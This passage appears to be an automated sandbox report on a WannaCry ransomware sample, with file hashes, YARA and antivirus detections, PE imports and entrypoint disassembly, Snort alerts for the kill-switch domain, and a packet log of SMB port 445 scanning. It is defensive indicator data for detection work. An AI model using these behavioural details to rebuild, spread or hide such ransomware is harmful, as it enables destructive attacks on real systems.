	JJuyd5UnAs.dll	Get hash	malicious	Wannacry, Virut	Browse
	OiE7MtX6tI.dll	Get hash	malicious	Wannacry, Virut	Browse
	FFrKRs5Q7y.dll	Get hash	malicious	Wannacry	Browse
	rQJydZ0McE.dll	Get hash	malicious	Wannacry	Browse
	svRn7r2Rty.dll	Get hash	malicious	Wannacry, Virut	Browse
	O9KOr4E9LK.dll	Get hash	malicious	Wannacry, Virut	Browse
	rvmsgjuGfo.dll	Get hash	malicious	Wannacry	Browse
	ovoq6aoWTi.dll	Get hash	malicious	Wannacry, Virut	Browse
	fxyKXb2hV5.dll	Get hash	malicious	Wannacry	Browse
	YsoENGep0M.dll	Get hash	malicious	Wannacry	Browse
	oap4r2jjhD.dll	Get hash	malicious	Wannacry	Browse

Created / dropped Files

C:\Windows\tasksche.exe

Download File

Process:	C:\Users\user\Desktop\stN592INV6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3514368
Entropy (8bit):	7.996072890929898
Encrypted:	true
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
MD5:	7F7CCAA16FB15EB1C7399D422F8363E8
SHA1:	BD44D0AB543BF814D93B719C24E90D8DD7111234
SHA-256:	2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
SHA-512:	83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
Malicious:	true
Yara Hits:	Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly) Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 98%
Joe Sandbox View:	Filename: onq54JS79W.exe, Detection: malicious, Browse Filename: mbXvGlj2dR.dll, Detection: malicious, Browse Filename: MSNRf9dZ63.exe, Detection: malicious, Browse Filename: 7Qu8thR7WW.dll, Detection: malicious, Browse Filename: MSmReFKunQ.dll, Detection: malicious, Browse Filename: kXpnLUmuU2.dll, Detection: malicious, Browse Filename: TigrxMihsc.dll, Detection: malicious, Browse Filename: iTQzi9bir4.dll, Detection: malicious, Browse Filename: 5nuyzrvshp.dll, Detection: malicious, Browse Filename: JJuyd5UnAs.dll, Detection: malicious, Browse Filename: OiE7MtX6tI.dll, Detection: malicious, Browse Filename: FFrKRs5Q7y.dll, Detection: malicious, Browse Filename: rQJydZ0McE.dll, Detection: malicious, Browse Filename: svRn7r2Rty.dll, Detection: malicious, Browse Filename: O9KOr4E9LK.dll, Detection: malicious, Browse Filename: rvmsgjuGfo.dll, Detection: malicious, Browse Filename: ovoq6aoWTi.dll, Detection: malicious, Browse Filename: fxyKXb2hV5.dll, Detection: malicious, Browse Filename: YsoENGep0M.dll, Detection: malicious, Browse Filename: oap4r2jjhD.dll, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9449540358183635
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	stN592INV6.exe
File size:	3751936
MD5:	31510bd9b6f5c297c64492ab86aacaa1
SHA1:	95f2b6d6fa1c48d71d2154270ba77aa3af74adc1
SHA256:	011c24bce46c2ded7236482e0e36530dd27c937e31a0896e91659d9acd7ceb69
SHA512:	7795c6e630e5ac91f96683ff64eff8550111f75ea76e992eb8be9c4bc70c5fdcc1daab34b035dde7b16fb658eb660c9b33e3822df47e89a39c63f446d30aad1c
SSDEEP:	98304:qDqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:qDqPe1Cxcxk3ZAEUadzR8yc4H
TLSH:	C8063394612CB2FCF0440EB44473896AB7B33C69A7BA5E1F9BC086670D53B5BAFD0641
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x409a16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x49F482D1 [Sun Apr 26 15:50:41 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9ecee117164e0b870a53dd187cdd7174

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040A1A0h
push 00409BA2h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040A0C0h]
pop ecx
or dword ptr [0070F894h], FFFFFFFFh
or dword ptr [0070F898h], FFFFFFFFh
call dword ptr [0040A0C8h]
mov ecx, dword ptr [0070F88Ch]
mov dword ptr [eax], ecx
call dword ptr [0040A0CCh]
mov ecx, dword ptr [0070F888h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040A0E4h]
mov eax, dword ptr [eax]
mov dword ptr [0070F890h], eax
call 00007F182CBC3AE1h
cmp dword ptr [00431410h], ebx
jne 00007F182CBC39CEh
push 00409B9Eh
call dword ptr [0040A0D4h]
pop ecx
call 00007F182CBC3AB3h
push 0040B010h
push 0040B00Ch
call 00007F182CBC3A9Eh
mov eax, dword ptr [0070F884h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0070F880h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040A0DCh]
push 0040B008h
push 0040B000h
call 00007F182CBC3A6Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1e0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x310000	0x362000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9000	0x9000	False	0.5344509548611112	data	6.1344811887775705	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x998	0x1000	False	0.29345703125	data	3.503615586181224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x30489c	0x27000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x310000	0x362000	0x362000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
metjdhr	0x672000	0x1000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country
R	0x3100a4	0x35a000	PE32 executable (GUI) Intel 80386, for MS Windows	English	United States
RT_VERSION	0x66a0a4	0x3b0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll	StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dll	closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll	??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll	GetAdaptersInfo, GetPerAdapterInfo
WININET.dll	InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll	__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6104.16.173.8049705802024298 05/08/23-05:35:39.911846	TCP	2024298	ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	49705	80	192.168.2.6	104.16.173.80
192.168.2.68.8.8.849786532024291 05/08/23-05:35:39.859181	UDP	2024291	ET TROJAN Possible WannaCry DNS Lookup 1	49786	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859575532024291 05/08/23-05:35:38.893922	UDP	2024291	ET TROJAN Possible WannaCry DNS Lookup 1	59575	53	192.168.2.6	8.8.8.8
104.16.173.80192.168.2.680497042031515 05/08/23-05:35:39.010206	TCP	2031515	ET TROJAN Known Sinkhole Response Kryptos Logic	80	49704	104.16.173.80	192.168.2.6
104.16.173.80192.168.2.680497052031515 05/08/23-05:35:39.944324	TCP	2031515	ET TROJAN Known Sinkhole Response Kryptos Logic	80	49705	104.16.173.80	192.168.2.6
192.168.2.6104.16.173.8049704802024298 05/08/23-05:35:38.979066	TCP	2024298	ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	49704	80	192.168.2.6	104.16.173.80

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2023 05:35:28.116609097 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.116869926 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.116947889 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.117001057 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.117050886 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.117089033 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.128632069 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.128683090 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129214048 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129254103 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129354954 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129388094 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129900932 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129940987 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.129973888 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130008936 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130043030 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130563974 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130598068 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130631924 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130667925 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130703926 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.130738020 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.131277084 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.131315947 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.131350040 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.131385088 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.131525993 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.135806084 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.135848045 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.135901928 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.136074066 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.136760950 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.136801004 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.136833906 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.136868954 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.136883974 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.136928082 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.136950016 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137001991 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.137037992 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.137070894 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.137073994 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137103081 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137110949 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.137135029 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137147903 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.137176037 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137212038 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137300968 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137348890 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137348890 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.137370110 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.148011923 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148087025 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148150921 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148358107 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148477077 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148607016 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148658037 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148804903 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148838997 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148926020 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148961067 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.148993969 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.149075985 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.149077892 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.149105072 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.149127007 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.149163961 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.149171114 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.149209023 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.149235964 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:28.192502022 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.192588091 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:35:28.192820072 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:35:38.941077948 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:38.957992077 CEST	80	49704	104.16.173.80	192.168.2.6
May 8, 2023 05:35:38.958189011 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:38.979065895 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:38.995882034 CEST	80	49704	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.010205984 CEST	80	49704	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.010261059 CEST	80	49704	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.010360003 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.012353897 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.012495041 CEST	49704	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.028955936 CEST	80	49704	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.894520044 CEST	49705	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.911293983 CEST	80	49705	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.911504030 CEST	49705	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.911845922 CEST	49705	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.928200006 CEST	80	49705	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.944324017 CEST	80	49705	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.944360971 CEST	80	49705	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.944505930 CEST	49705	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.948034048 CEST	49705	80	192.168.2.6	104.16.173.80
May 8, 2023 05:35:39.964541912 CEST	80	49705	104.16.173.80	192.168.2.6
May 8, 2023 05:35:39.969191074 CEST	49706	445	192.168.2.6	137.59.244.89
May 8, 2023 05:35:41.118743896 CEST	49720	445	192.168.2.6	190.118.148.211
May 8, 2023 05:35:41.992932081 CEST	49728	445	192.168.2.6	120.77.189.201
May 8, 2023 05:35:42.263561964 CEST	49731	445	192.168.2.6	203.113.203.78
May 8, 2023 05:35:43.134933949 CEST	49740	445	192.168.2.6	61.49.83.44
May 8, 2023 05:35:43.384730101 CEST	49745	445	192.168.2.6	42.153.119.52
May 8, 2023 05:35:44.013941050 CEST	49753	445	192.168.2.6	12.119.25.17
May 8, 2023 05:35:44.259670973 CEST	49756	445	192.168.2.6	86.18.224.16
May 8, 2023 05:35:44.509831905 CEST	49760	445	192.168.2.6	168.248.8.247
May 8, 2023 05:35:45.134308100 CEST	49767	445	192.168.2.6	62.24.28.70
May 8, 2023 05:35:45.384983063 CEST	49771	445	192.168.2.6	162.149.186.105
May 8, 2023 05:35:45.619575024 CEST	49775	445	192.168.2.6	95.151.132.161
May 8, 2023 05:35:46.027952909 CEST	49779	445	192.168.2.6	11.111.31.149
May 8, 2023 05:35:46.260057926 CEST	49782	445	192.168.2.6	190.108.6.156
May 8, 2023 05:35:46.509325027 CEST	49786	445	192.168.2.6	146.15.103.115
May 8, 2023 05:35:46.760091066 CEST	49790	445	192.168.2.6	143.34.176.103
May 8, 2023 05:35:47.134912968 CEST	49794	445	192.168.2.6	200.42.254.144
May 8, 2023 05:35:47.385158062 CEST	49798	445	192.168.2.6	181.13.26.231
May 8, 2023 05:35:47.618863106 CEST	49801	445	192.168.2.6	89.115.165.85
May 8, 2023 05:35:47.884587049 CEST	49805	445	192.168.2.6	217.209.229.25
May 8, 2023 05:35:48.043251991 CEST	49806	445	192.168.2.6	75.204.201.85
May 8, 2023 05:35:48.260382891 CEST	49809	445	192.168.2.6	153.69.48.166
May 8, 2023 05:35:48.509596109 CEST	49813	445	192.168.2.6	153.222.136.183
May 8, 2023 05:35:48.761775970 CEST	49817	445	192.168.2.6	201.9.113.86
May 8, 2023 05:35:49.014508963 CEST	49821	445	192.168.2.6	108.64.144.230
May 8, 2023 05:35:49.150226116 CEST	49823	445	192.168.2.6	184.3.102.154
May 8, 2023 05:35:49.368913889 CEST	49826	445	192.168.2.6	130.94.105.171
May 8, 2023 05:35:49.619184971 CEST	49830	445	192.168.2.6	1.147.36.149
May 8, 2023 05:35:49.869869947 CEST	49834	445	192.168.2.6	162.208.80.235
May 8, 2023 05:35:50.059712887 CEST	49837	445	192.168.2.6	148.239.37.117
May 8, 2023 05:35:50.119041920 CEST	49838	445	192.168.2.6	182.147.22.28
May 8, 2023 05:35:50.260143995 CEST	49840	445	192.168.2.6	203.157.253.108
May 8, 2023 05:35:50.511120081 CEST	49843	445	192.168.2.6	128.33.238.145
May 8, 2023 05:35:50.772084951 CEST	49847	445	192.168.2.6	7.77.74.43
May 8, 2023 05:35:51.025962114 CEST	49851	445	192.168.2.6	157.134.95.47
May 8, 2023 05:35:51.167617083 CEST	49853	445	192.168.2.6	126.161.249.108
May 8, 2023 05:35:51.457843065 CEST	49855	445	192.168.2.6	133.160.152.195
May 8, 2023 05:35:51.614835978 CEST	49857	445	192.168.2.6	79.17.98.235
May 8, 2023 05:35:51.655905962 CEST	49859	445	192.168.2.6	160.1.36.202
May 8, 2023 05:35:51.660772085 CEST	445	49857	79.17.98.235	192.168.2.6
May 8, 2023 05:35:51.962948084 CEST	49863	445	192.168.2.6	115.127.152.181
May 8, 2023 05:35:52.074697018 CEST	49865	445	192.168.2.6	207.147.160.97
May 8, 2023 05:35:52.165489912 CEST	49857	445	192.168.2.6	79.17.98.235
May 8, 2023 05:35:52.167081118 CEST	49867	445	192.168.2.6	183.120.64.145
May 8, 2023 05:35:52.209824085 CEST	445	49857	79.17.98.235	192.168.2.6
May 8, 2023 05:35:52.712441921 CEST	49857	445	192.168.2.6	79.17.98.235
May 8, 2023 05:35:52.779756069 CEST	49869	445	192.168.2.6	15.168.54.13
May 8, 2023 05:35:52.886148930 CEST	49872	445	192.168.2.6	85.6.13.103
May 8, 2023 05:35:52.886857986 CEST	49873	445	192.168.2.6	201.135.192.42
May 8, 2023 05:35:52.887521982 CEST	49874	445	192.168.2.6	74.164.149.18
May 8, 2023 05:35:53.072846889 CEST	49877	445	192.168.2.6	200.205.145.143
May 8, 2023 05:35:53.214935064 CEST	49879	445	192.168.2.6	36.52.38.227
May 8, 2023 05:35:53.376074076 CEST	49881	445	192.168.2.6	169.6.177.201
May 8, 2023 05:35:54.757519960 CEST	49885	445	192.168.2.6	17.156.154.96
May 8, 2023 05:35:54.856908083 CEST	49886	445	192.168.2.6	40.229.51.247
May 8, 2023 05:35:54.857548952 CEST	49887	445	192.168.2.6	213.110.209.80
May 8, 2023 05:35:54.858108044 CEST	49888	445	192.168.2.6	110.128.220.15
May 8, 2023 05:35:54.858604908 CEST	49889	445	192.168.2.6	217.246.253.154
May 8, 2023 05:35:54.859163046 CEST	49890	445	192.168.2.6	195.172.214.139
May 8, 2023 05:35:54.859702110 CEST	49891	445	192.168.2.6	85.115.125.21
May 8, 2023 05:35:54.861021996 CEST	49892	445	192.168.2.6	57.31.179.140
May 8, 2023 05:35:55.858968019 CEST	49904	445	192.168.2.6	203.196.248.188
May 8, 2023 05:35:56.010554075 CEST	49907	445	192.168.2.6	125.116.173.102
May 8, 2023 05:35:56.010993004 CEST	49908	445	192.168.2.6	144.48.74.9
May 8, 2023 05:35:56.011373043 CEST	49909	445	192.168.2.6	40.206.101.103
May 8, 2023 05:35:56.011924982 CEST	49910	445	192.168.2.6	189.187.173.131
May 8, 2023 05:35:56.012355089 CEST	49911	445	192.168.2.6	131.116.202.41
May 8, 2023 05:35:56.012916088 CEST	49912	445	192.168.2.6	182.180.144.54
May 8, 2023 05:35:56.013478994 CEST	49913	445	192.168.2.6	62.193.98.47
May 8, 2023 05:35:56.760268927 CEST	49922	445	192.168.2.6	60.228.20.112
May 8, 2023 05:35:56.978668928 CEST	49925	445	192.168.2.6	69.124.7.228
May 8, 2023 05:35:57.135807991 CEST	49928	445	192.168.2.6	161.189.238.237
May 8, 2023 05:35:57.139429092 CEST	49929	445	192.168.2.6	39.60.195.81
May 8, 2023 05:35:57.140516043 CEST	49930	445	192.168.2.6	165.99.69.20
May 8, 2023 05:35:57.141297102 CEST	49931	445	192.168.2.6	43.115.73.125
May 8, 2023 05:35:57.142199039 CEST	49932	445	192.168.2.6	139.161.65.129
May 8, 2023 05:35:57.142952919 CEST	49933	445	192.168.2.6	20.32.178.116
May 8, 2023 05:35:57.143718004 CEST	49934	445	192.168.2.6	202.133.31.212
May 8, 2023 05:35:57.870718956 CEST	49942	445	192.168.2.6	115.153.232.240
May 8, 2023 05:35:58.088550091 CEST	49945	445	192.168.2.6	116.199.172.44
May 8, 2023 05:35:58.261337042 CEST	49948	445	192.168.2.6	121.56.242.226
May 8, 2023 05:35:58.261337996 CEST	49949	445	192.168.2.6	132.220.182.122
May 8, 2023 05:35:58.261707067 CEST	49950	445	192.168.2.6	169.127.237.124
May 8, 2023 05:35:58.262216091 CEST	49951	445	192.168.2.6	160.91.65.247
May 8, 2023 05:35:58.262984991 CEST	49952	445	192.168.2.6	56.173.171.154
May 8, 2023 05:35:58.263457060 CEST	49953	445	192.168.2.6	128.48.184.173
May 8, 2023 05:35:58.264127970 CEST	49954	445	192.168.2.6	113.239.38.13
May 8, 2023 05:35:58.776803970 CEST	49961	445	192.168.2.6	149.54.201.228
May 8, 2023 05:35:58.994837046 CEST	49963	445	192.168.2.6	126.29.224.43
May 8, 2023 05:35:59.213911057 CEST	49966	445	192.168.2.6	73.87.161.90
May 8, 2023 05:35:59.388933897 CEST	49969	445	192.168.2.6	128.68.240.29
May 8, 2023 05:35:59.388983011 CEST	49970	445	192.168.2.6	171.137.88.210
May 8, 2023 05:35:59.389051914 CEST	49971	445	192.168.2.6	109.154.182.228
May 8, 2023 05:35:59.389173985 CEST	49972	445	192.168.2.6	194.92.135.184
May 8, 2023 05:35:59.389193058 CEST	49973	445	192.168.2.6	181.229.18.59
May 8, 2023 05:35:59.389301062 CEST	49974	445	192.168.2.6	62.60.241.54
May 8, 2023 05:35:59.389389992 CEST	49975	445	192.168.2.6	148.185.135.13
May 8, 2023 05:35:59.885238886 CEST	49981	445	192.168.2.6	198.217.125.26
May 8, 2023 05:36:00.120230913 CEST	49985	445	192.168.2.6	35.181.144.93
May 8, 2023 05:36:00.338668108 CEST	49987	445	192.168.2.6	60.9.91.17
